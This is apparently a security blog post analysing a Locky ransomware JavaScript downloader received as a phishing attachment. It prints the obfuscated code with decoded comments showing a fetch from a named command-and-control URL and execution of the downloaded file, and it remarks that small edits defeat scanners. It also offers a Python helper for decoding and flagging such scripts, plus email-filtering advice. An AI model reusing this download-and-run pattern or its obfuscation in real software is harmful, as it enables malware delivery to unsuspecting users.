
TrojanDownloader:JS/Locky.A is a terrible piece of malware

27 February 2016

Outlook is definitely my favorite email app. If it is properly configured, spear phishing attacks are easy to spot, and this one was no exception.

Figure: Email with Locky attachment.

Since the attachment was too small to contain an image, I opened the zip file and found a JavaScript version of Locky.A inside. As usual, most of the popular anti-malware scanners identified the malicious code only after one day.

It is always good to know the enemy. Therefore, I have put the code snippet that downloads the payload from the Command & Control server here:

try {
    var jsaykajS = '\u0052un';
    /* Translates into:  var jsaykajS = 'Run'; */

    wRXGXAa['\u006Fpe\u006E']('\u0047ET' , '\u0068\u0074\u0074\u0070:\u002F\u002F\u007A\u0061\u007Aa\u002D\u006B\u0079\u006A\u006F\u0076\u002E\u0063\u007A\u002F\u0073\u0079\u0073\u0074\u0065\u006D\u002F\u0063\u0061\u0063\u0068\u0065\u002F\u0038\u0037\u0068\u0037\u0035\u0034', false);
    /* Translates into:  wRXGXAa['open']('GET', 'http://zaza-kyjov.cz/system/cache/87h754', false); */

    wRXGXAa['\u0073\u0065nd']();
    /* Translates into:  wRXGXAa['send'](); */

    lRJrL[jsaykajS](LWHEQOz, 1, false);
    /* Translates into:  lRJrL['Run'](LWHEQOz, 1, false);  -- runs the downloaded file */
} catch (ajg9ggxFs) {};

It is important to note that even small changes to the code cut the detection rate dramatically. Cyber criminals can create new versions easily because JavaScript is plain text that can be modified with Notepad. Against this, classic anti-malware systems have only a limited effect.
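As an added example (not code from the original post), here is a small Python triage helper that strips the \uXXXX escapes seen above (and \xHH escapes, which the same trick also uses), then pulls out the URL and the open/send/Run strings a reviewer wants to see. The sample script, its variable names and the example.invalid host are constructed for the demonstration, not taken from the real downloader.

```python
import re

# A JavaScript \uXXXX (4 hex digits) or \xHH (2 hex digits) escape; this is how the
# downloader hides 'Run', 'open', 'send' and the download URL from string matching.
_ESCAPE = re.compile(r'\\(?:u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2}))')

def decode_unicode_escapes(src: str) -> str:
    """Replace every \\uXXXX / \\xHH escape in JavaScript source with its character."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), src)

# After decoding: HTTP(S) URLs, and string literals naming the members a download-and-run
# script needs (XMLHttpRequest open/send, WScript.Shell Run).
_URL = re.compile(r'https?://[^\s\'"]+')
_STRING_LITERAL = re.compile(r"'([^'\\]*)'|\"([^\"\\]*)\"")
SUSPICIOUS_NAMES = {"open", "send", "Run"}

def extract_indicators(src: str) -> dict:
    """Decode escapes, then return URLs, suspicious literals and how many escapes were used."""
    decoded = decode_unicode_escapes(src)
    literals = {a or b for a, b in _STRING_LITERAL.findall(decoded)}
    return {
        "urls": _URL.findall(decoded),
        "apis": sorted(literals & SUSPICIOUS_NAMES),
        "escape_count": len(_ESCAPE.findall(src)),
    }

def looks_like_downloader(src: str) -> bool:
    """Heuristic: escaped strings + a URL + open, send and Run is the shape shown above."""
    ind = extract_indicators(src)
    return ind["escape_count"] > 0 and bool(ind["urls"]) and SUSPICIOUS_NAMES <= set(ind["apis"])

# Constructed sample in the style of the snippet above; host and path are placeholders.
SAMPLE = r"""try {
var jsaykajS = '\u0052un';
wRXGXAa['\u006Fpe\u006E']('\u0047ET', '\u0068\u0074\u0074\u0070://example.invalid/\u0070ayload', false);
wRXGXAa['\u0073\u0065nd']();
lRJrL[jsaykajS](LWHEQOz, 1, false);
} catch (e) {};"""

if __name__ == "__main__":
    print(extract_indicators(SAMPLE))
    print("downloader-like:", looks_like_downloader(SAMPLE))
```

The same decoding step is what makes a mail-gateway rule stable across the trivial re-encodings the post describes, since the rule then matches the decoded strings rather than one particular escape pattern.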

How to deal with this challenge? The first line of defense is, as always, user awareness training.

In addition, in-depth scanning of all incoming and outgoing emails is required. To be honest, I would recommend stripping off suspicious attachments (scripts, executables, compressed files, old-style Office documents, xlsm, docm, PDFs with embedded files, etc.) and notifying the users of the protection measures taken.

Users will not be thrilled, but that is much better than paying lots of money to cyber criminals or going out of business for a long time.

Have a good weekend, and take care.